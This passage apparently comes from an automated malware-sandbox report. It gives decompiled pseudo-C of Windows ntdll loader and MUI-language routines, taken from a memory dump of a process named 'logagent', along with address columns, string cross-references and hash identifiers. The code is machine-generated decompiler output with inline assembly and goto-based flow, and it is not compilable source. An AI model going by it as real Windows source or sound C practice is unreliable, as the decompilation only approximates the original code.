					_v8 = _t280;
				}
				if(E051C1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E051C1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E051C1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L051D4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E051FF3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E05201370(_t276, 0x5194e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E051FBB40(0,  &_v68, _t170);
									if(L051C43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E051FBB40(_t257,  &_v68, _t243);
								if(L051C43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E05201370(_t278, 0x5194e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L051D4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E051FF3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E05201370(_v16, 0x5194e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E051FBB40(_t262,  &_v68, _t244);
								if(L051C43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E05201370(_t282, 0x5194e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E051FBB40(_t262,  &_v68, _t201);
							if(L051C43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L051D4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E051FF3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E05201370(_t280, 0x5194e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E051FBB40(_t267,  &_v68, _t245);
							if(L051C43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E05201370(_t284, 0x5194e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E051FBB40(_t267,  &_v68, _t224);
						if(L051C43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                              0x051c3d3c
                                              0x051c3d42
                                              0x051c3d44
                                              0x051c3d46
                                              0x051c3d49
                                              0x051c3d4c
                                              0x051c3d4f
                                              0x051c3d52
                                              0x051c3d55
                                              0x051c3d58
                                              0x051c3d5b
                                              0x051c3d5f
                                              0x051c3d61
                                              0x051c3d66
                                              0x05218213
                                              0x05218218
                                              0x051c4085
                                              0x051c4088
                                              0x051c408e
                                              0x051c4094
                                              0x051c409a
                                              0x051c40a0
                                              0x051c40a6
                                              0x051c40a9
                                              0x051c40af
                                              0x051c40b6
                                              0x051c40bd
                                              0x051c40bd
                                              0x051c3d83
                                              0x0521821f
                                              0x05218229
                                              0x05218238
                                              0x05218238
                                              0x0521823d
                                              0x0521823d
                                              0x051c3da0
                                              0x051c3daf
                                              0x051c3db5
                                              0x051c3dba
                                              0x051c3dba
                                              0x051c3dd4
                                              0x051c3e94
                                              0x051c3eab
                                              0x051c3f6d
                                              0x051c3f84
                                              0x051c406b
                                              0x051c406b
                                              0x051c406e
                                              0x051c406e
                                              0x051c4070
                                              0x051c4074
                                              0x05218351
                                              0x05218351
                                              0x051c407a
                                              0x051c407f
                                              0x0521835d
                                              0x05218370
                                              0x05218377
                                              0x05218379
                                              0x0521837c
                                              0x0521837c
                                              0x0521835d
                                              0x00000000
                                              0x051c407f
                                              0x051c3f8a
                                              0x051c3f8d
                                              0x051c3f90
                                              0x051c3f95
                                              0x0521830d
                                              0x0521830f
                                              0x051c3f9b
                                              0x051c3fac
                                              0x051c3fae
                                              0x051c3fb1
                                              0x051c3fb1
                                              0x051c3fb6
                                              0x05218317
                                              0x0521831a
                                              0x00000000
                                              0x051c3fbc
                                              0x051c3fc1
                                              0x051c3fc9
                                              0x051c3fd7
                                              0x051c3fda
                                              0x051c3fdd
                                              0x051c4021
                                              0x051c4021
                                              0x051c4029
                                              0x051c4030
                                              0x051c4044
                                              0x051c4046
                                              0x051c4046
                                              0x051c4044
                                              0x051c4049
                                              0x05218327
                                              0x05218334
                                              0x05218339
                                              0x0521833c
                                              0x051c404f
                                              0x051c404f
                                              0x051c404f
                                              0x051c4051
                                              0x051c4056
                                              0x051c4063
                                              0x051c4063
                                              0x051c4068
                                              0x00000000
                                              0x051c4068
                                              0x051c3fdf
                                              0x051c3fe2
                                              0x051c3fe4
                                              0x051c3fe7
                                              0x051c3fef
                                              0x051c4003
                                              0x051c4005
                                              0x051c4005
                                              0x051c400c
                                              0x051c4013
                                              0x051c4016
                                              0x051c4017
                                              0x051c401b
                                              0x051c401e
                                              0x00000000
                                              0x051c401e
                                              0x051c3fb6
                                              0x051c3eb1
                                              0x051c3eb4
                                              0x051c3eb7
                                              0x051c3ebc
                                              0x052182a9
                                              0x052182ab
                                              0x051c3ec2
                                              0x051c3ed3
                                              0x051c3ed5
                                              0x051c3ed8
                                              0x051c3ed8
                                              0x051c3edd
                                              0x052182b3
                                              0x052182b6
                                              0x00000000
                                              0x051c3ee3
                                              0x051c3ee8
                                              0x051c3eed
                                              0x051c3ef0
                                              0x051c3ef3
                                              0x051c3f02
                                              0x051c3f05
                                              0x051c3f08
                                              0x052182c0
                                              0x052182c3
                                              0x052182c5
                                              0x052182c8
                                              0x052182d0
                                              0x052182e4
                                              0x052182e6
                                              0x052182e6
                                              0x052182ed
                                              0x052182f4
                                              0x052182f7
                                              0x052182f8
                                              0x052182fc
                                              0x052182ff
                                              0x052182ff
                                              0x051c3f0e
                                              0x051c3f11
                                              0x051c3f16
                                              0x051c3f1d
                                              0x051c3f31
                                              0x05218307
                                              0x05218307
                                              0x051c3f31
                                              0x051c3f39
                                              0x051c3f48
                                              0x051c3f4d
                                              0x051c3f50
                                              0x051c3f50
                                              0x051c3f53
                                              0x051c3f58
                                              0x051c3f65
                                              0x051c3f65
                                              0x051c3f6a
                                              0x00000000
                                              0x051c3f6a
                                              0x051c3edd
                                              0x051c3dda
                                              0x051c3ddd
                                              0x051c3de0
                                              0x051c3de5
                                              0x05218245
                                              0x051c3deb
                                              0x051c3df7
                                              0x051c3dfc
                                              0x051c3dfe
                                              0x051c3e01
                                              0x051c3e01
                                              0x051c3e06
                                              0x0521824d
                                              0x0521824f
                                              0x05218254
                                              0x00000000
                                              0x051c3e0c
                                              0x051c3e11
                                              0x051c3e16
                                              0x051c3e19
                                              0x051c3e29
                                              0x051c3e2c
                                              0x051c3e2f
                                              0x0521825c
                                              0x0521825f
                                              0x05218261
                                              0x05218264
                                              0x0521826c
                                              0x05218280
                                              0x05218282
                                              0x05218282
                                              0x05218289
                                              0x05218290
                                              0x05218293
                                              0x05218294
                                              0x05218298
                                              0x0521829b
                                              0x0521829b
                                              0x051c3e35
                                              0x051c3e38
                                              0x051c3e3d
                                              0x051c3e44
                                              0x051c3e58
                                              0x052182a3
                                              0x052182a3
                                              0x051c3e58
                                              0x051c3e60
                                              0x051c3e6f
                                              0x051c3e74
                                              0x051c3e77
                                              0x051c3e77
                                              0x051c3e7a
                                              0x051c3e7f
                                              0x051c3e8c
                                              0x051c3e8c
                                              0x051c3e91
                                              0x00000000
                                              0x051c3e91

                                              Strings
                                              • Kernel-MUI-Number-Allowed, xrefs: 051C3D8C
                                              • Kernel-MUI-Language-Allowed, xrefs: 051C3DC0
                                              • Kernel-MUI-Language-SKU, xrefs: 051C3F70
                                              • Kernel-MUI-Language-Disallowed, xrefs: 051C3E97
                                              • WindowsExcludedProcs, xrefs: 051C3D6F
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                              • API String ID: 0-258546922
                                              • Opcode ID: 75e9993722e75d52456dcd56478dea60817a6c47de3a9e91bee0d8e2cdd5553a
                                              • Instruction ID: 21f9944c5bad642d576e77b861cc9caa7be80a949c7c131a892f28988e83ec04
                                              • Opcode Fuzzy Hash: 75e9993722e75d52456dcd56478dea60817a6c47de3a9e91bee0d8e2cdd5553a
                                              • Instruction Fuzzy Hash: 6FF19B72E04219EFCF15DF98C984EEEBBB9FF18600F1444AAE905A7251D7759E01CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051E8E00 Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 44%
                                              			E051E8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x52ad360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x52a8464; // 0x76d90110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x52a5780 & 0x00000003) != 0) {
							E05235510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x52a5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E051FB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x52a7984; // 0x3452c80
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x52a8464; // 0x76d90110
					 *0x52ab1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E051E9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x52a5780 & 0x00000005) != 0) {
						_push(_t49);
						E05235510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                              0x051e8e0f
                                              0x051e8e16
                                              0x051e8e19
                                              0x051e8e1b
                                              0x051e8e21
                                              0x051e8e7f
                                              0x051e8e85
                                              0x05229354
                                              0x0522936c
                                              0x05229371
                                              0x0522937b
                                              0x05229381
                                              0x05229381
                                              0x0522937b
                                              0x051e8e9d
                                              0x051e8e9d
                                              0x051e8e29
                                              0x051e8e2c
                                              0x051e8e38
                                              0x051e8e3e
                                              0x051e8e43
                                              0x051e8eb5
                                              0x051e8eb9
                                              0x052292aa
                                              0x052292af
                                              0x052292e8
                                              0x052292e8
                                              0x052292af
                                              0x051e8eb9
                                              0x051e8e45
                                              0x051e8e53
                                              0x051e8e5b
                                              0x051e8e5f
                                              0x051e8e78
                                              0x051e8e78
                                              0x051e8e7d
                                              0x051e8ec3
                                              0x051e8ecd
                                              0x051e8ed2
                                              0x051e8ed2
                                              0x051e8ec5
                                              0x051e8ec5
                                              0x00000000
                                              0x051e8e7d
                                              0x051e8e67
                                              0x051e8ea4
                                              0x0522931a
                                              0x00000000
                                              0x00000000
                                              0x05229320
                                              0x051e8ea4
                                              0x051e8e70
                                              0x05229325
                                              0x05229340
                                              0x05229345
                                              0x05229345
                                              0x051e8e76
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000

                                              Strings
                                              • LdrpFindDllActivationContext, xrefs: 05229331, 0522935D
                                              • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0522932A
                                              • Querying the active activation context failed with status 0x%08lx, xrefs: 05229357
                                              • minkernel\ntdll\ldrsnap.c, xrefs: 0522933B, 05229367
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                              • API String ID: 0-3779518884
                                              • Opcode ID: bbf7c399dc7dc7c6938c5c375651bfdfd2f676517e3a68f9cbd89eb422207f36
                                              • Instruction ID: b7db4f9c6e479d540606417b6b764407af2f68fa38cc3484df1310403ef753b9
                                              • Opcode Fuzzy Hash: bbf7c399dc7dc7c6938c5c375651bfdfd2f676517e3a68f9cbd89eb422207f36
                                              • Instruction Fuzzy Hash: 69413832A14B11BFDF39AB58C88DE76B7B6BF00658F0A4169E90957190EB70ADC087C1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051C8794 Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 83%
                                              			E051C8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E051C934A() != 0) {
								_t159 = E0523A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x52a5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E05235510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x52a5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E051C849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E051C8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E051C8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x52a5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x52a5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E051D2280(_t92, 0x52a86cc);
															_t94 = E05289DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E051E61A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x52a5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E051C8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x52a5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x52a5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E051FF380(_t136, 0x5191184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E051D2280(_t108, 0x52a86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E051E61A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E05289D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E051CFFB0(_t118, _t156, 0x52a86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E051F9A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                              0x051c8799
                                              0x051c879d
                                              0x051c87a1
                                              0x051c87a3
                                              0x051c87a8
                                              0x051c87c3
                                              0x051c87c3
                                              0x051c87c8
                                              0x051c87d1
                                              0x051c87d4
                                              0x051c87d8
                                              0x051c87e5
                                              0x051c87ec
                                              0x05219bfe
                                              0x05219c00
                                              0x05219c02
                                              0x05219c08
                                              0x05219c0d
                                              0x05219c0f
                                              0x05219c14
                                              0x05219c2d
                                              0x05219c32
                                              0x05219c37
                                              0x05219c3a
                                              0x05219c3c
                                              0x05219c42
                                              0x05219c42
                                              0x05219c3c
                                              0x05219c02
                                              0x051c87da
                                              0x051c87df
                                              0x051c87e3
                                              0x00000000
                                              0x00000000
                                              0x051c87e3
                                              0x051c87f2
                                              0x00000000
                                              0x051c87fb
                                              0x051c87fd
                                              0x051c87fe
                                              0x051c880e
                                              0x051c880f
                                              0x051c8810
                                              0x051c8814
                                              0x051c881a
                                              0x051c881c
                                              0x051c881f
                                              0x051c8821
                                              0x051c8822
                                              0x051c8824
                                              0x051c8826
                                              0x051c882c
                                              0x051c882e
                                              0x05219c48
                                              0x05219c48
                                              0x051c8834
                                              0x051c8834
                                              0x051c8837
                                              0x00000000
                                              0x00000000
                                              0x051c8837
                                              0x051c882e
                                              0x051c883d
                                              0x051c8840
                                              0x051c8843
                                              0x051c8846
                                              0x051c8849
                                              0x051c884c
                                              0x051c884e
                                              0x051c8850
                                              0x051c8852
                                              0x051c8854
                                              0x051c8857
                                              0x051c88b4
                                              0x051c88b6
                                              0x051c88b6
                                              0x051c8859
                                              0x051c8859
                                              0x051c8859
                                              0x051c8861
                                              0x051c8866
                                              0x051c886a
                                              0x051c893d
                                              0x051c8941
                                              0x00000000
                                              0x051c8947
                                              0x051c8947
                                              0x051c894a
                                              0x051c894c
                                              0x00000000
                                              0x051c8952
                                              0x051c8955
                                              0x051c895a
                                              0x051c895d
                                              0x051c895d
                                              0x051c895f
                                              0x051c8961
                                              0x051c8961
                                              0x051c8968
                                              0x00000000
                                              0x00000000
                                              0x051c896a
                                              0x051c896b
                                              0x051c896e
                                              0x00000000
                                              0x051c8970
                                              0x051c8970
                                              0x051c8970
                                              0x051c8970
                                              0x051c8972
                                              0x051c8972
                                              0x051c8974
                                              0x00000000
                                              0x051c897a
                                              0x051c897a
                                              0x051c897d
                                              0x00000000
                                              0x051c8983
                                              0x05219c65
                                              0x05219c6d
                                              0x05219c72
                                              0x05219c75
                                              0x05219c75
                                              0x05219c82
                                              0x05219c86
                                              0x05219c87
                                              0x05219c88
                                              0x05219c89
                                              0x05219c8c
                                              0x05219c90
                                              0x05219c95
                                              0x05219c97
                                              0x05219ca0
                                              0x05219ca3
                                              0x05219ca9
                                              0x05219ca9
                                              0x00000000
                                              0x05219ca9
                                              0x05219ca3
                                              0x00000000
                                              0x05219c97
                                              0x051c897d
                                              0x00000000
                                              0x051c8974
                                              0x051c8988
                                              0x051c8992
                                              0x051c8996
                                              0x00000000
                                              0x051c8996
                                              0x051c894c
                                              0x00000000
                                              0x051c8870
                                              0x051c887b
                                              0x051c887d
                                              0x051c887f
                                              0x051c8881
                                              0x051c8884
                                              0x051c8884
                                              0x051c8886
                                              0x051c8889
                                              0x051c888c
                                              0x051c888e
                                              0x051c8891
                                              0x051c8891
                                              0x051c8898
                                              0x00000000
                                              0x00000000
                                              0x051c889a
                                              0x051c889b
                                              0x051c889e
                                              0x00000000
                                              0x00000000
                                              0x051c88a0
                                              0x051c88a8
                                              0x051c88b0
                                              0x051c88b2
                                              0x051c88d3
                                              0x051c88d5
                                              0x00000000
                                              0x051c88d7
                                              0x051c88db
                                              0x051c88dc
                                              0x051c88e0
                                              0x051c88e8
                                              0x051c88ee
                                              0x051c88f0
                                              0x051c88f3
                                              0x051c88fc
                                              0x051c8901
                                              0x051c8906
                                              0x051c890c
                                              0x051c890c
                                              0x051c890f
                                              0x051c8916
                                              0x051c8917
                                              0x051c8918
                                              0x051c8919
                                              0x051c891a
                                              0x051c891f
                                              0x051c8921
                                              0x05219c52
                                              0x05219c55
                                              0x05219c5b
                                              0x05219cac
                                              0x05219cc0
                                              0x05219cc0
                                              0x05219c55
                                              0x051c8927
